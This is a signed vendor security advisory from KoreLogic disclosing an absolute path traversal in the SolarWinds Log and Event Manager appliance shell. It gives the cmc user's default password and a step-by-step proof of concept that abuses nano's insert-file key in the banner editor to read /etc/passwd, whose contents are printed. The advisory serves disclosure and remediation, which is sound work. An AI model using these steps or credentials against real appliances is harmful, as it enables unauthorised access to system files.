-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read Title: Solarwinds LEM Management Shell Arbitrary File Read Advisory ID: KL-001-2017-008 Publication Date: 2017.04.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-008.txt 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-36: Absolute Path Traversal Impact: Information Disclosure Attack vector: SSH 2. Vulnerability Description The management shell allows the end user to edit the MOTD banner displayed during SSH logon. The editor provided for this is nano. This editor has a keyboard mapped function which lets the user import a file from the local file system into the editor. An attacker can abuse this to read arbitrary files within the allowed permissions. 3. Technical Description Should an attacker gain access to the SSH console for the cmc user, read access to files on the local filesystem can be achieved. The default password for the cmc user is "password". This is accomplished by abusing the editor selection for the MOTD banner edit functionality. $ ssh cmc@1.3.3.7 Password: Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64 Last login: Sun Dec 11 11:35:29 2016 from 1.3.3.6 ////////////////////////////////////////////////// /// SolarWinds Log & Event Manager /// /// management console /// ////////////////////////////////////////////////// Detected VMware Virtual Platform Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH Available commands: [ appliance ] Network, System [ manager ] Upgrade, Debug [ service ] Restrictions, SSH, Snort [ ndepth ] nDepth Configuration/Maintenance upgrade Upgrade this Appliance admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration) import Import a file that can be used from the Admin UI help display this help exit Exit cmc > appliance Available commands: activate Activate appliance features after licensing. checklogs Check Appliance Logs for Remote Data clearsyslog Clear Syslog Logs cleantemp * Clean Up Temporary Files multimanagerconfig * Enable/disable multimanager dateconfig Update Date and Time dbdiskconfig * Configure database retention diskusage Check Disk Usage of your Manager diskusageconfig Set Disk Usage Limit of your Manager editbanner Edit the SSH login banner. exportsyslog Export System Logs hostname Change the Manager Appliance hostname import Import SIM/LEM Backup to LEM limitsyslog Configure the syslog rotation limit (default: 50) setlogrotate Configure the syslog rotation frequency (hourly or daily) netconfig Configure Network Parameters (IP Address, Netmask, DNS) ntpconfig Update NTP Server Preferences password Change the CMC User Password ping Ping an IP address or hostname reboot Reboot the Manager Appliance resetsystemmac Reset the MAC address of the Appliance shutdown Shut Down the Manager Appliance top View Manager Appliance CPU/Memory Utilization tzconfig Update Time Zone information viewnetconfig View Network Parameters (IP address, netmask, DNS) exit Return to main menu NOTE: Commands with an asterisk (*) include an automatic manager service restart cmc::appliance > editbanner Press to configure the SSH banner. Once inside nano, ^R to get the screen below: File to insert [from ./] : /etc/passwd ^G Get Help ^C Cancel The result will be: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false trigeo:x:1000:1000:trigeo,,,:/usr/local/contego/:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:101:104:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash cmc:x:1001:1000:CMC,,,:/usr/local/contego/:/usr/local/contego/scripts/mgrconfig.pl libuuid:x:105:107::/var/lib/libuuid:/bin/sh snort:x:103:105:Snort IDS:/var/log/snort:/bin/false messagebus:x:106:109::/var/run/dbus:/bin/false snmp:x:104:108::/var/lib/snmp:/bin/false lynx:x:1002:1003::/home/lynx:/bin/sh 4. Mitigation and Remediation Recommendation The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at: https://thwack.solarwinds.com/thread/111223 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc. 6. Disclosure Timeline 2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwinds using PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F. 2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel. 2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact. 2017.02.23 - Solarwinds confirms receipt of vulnerability report. 2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details. 2017.04.11 - Solarwinds releases hotfix and public disclosure. 2017.04.24 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt -----BEGIN PGP SIGNATURE----- iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlj+V6UaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQz+7wf6A5Ra5gmsYK5lXn7JoqO7 YrbPk/YMfHKYLjoLGaHn/emoNAhKLxxvZAPEs2NzyQHj9vXVqHcZt1E3767Hea66 lMcilOt2yqHV1C1srdKgW5ZIRD/6UkS3QW1L3FhcWOocXi7yP7Lf9ULGveRKE2Q9 HCmsIbvaZC2PJRnS56h8NCapxbT1n2V0+xZ5CMWqN8TulDofplrKcodw3kd6fKzB q69bTpG9LMeh3QBnjP68VnEZb00EsUClr8EVRjnz21Xaj6dpYFV9WewLZnq1op84 ng5rqwB+aV2CRwLcuWIAP54ONd7tYVoz0EbSbDtENoNNm3dSBfcOmknl6hYhPinv Bg== =3z7Q -----END PGP SIGNATURE-----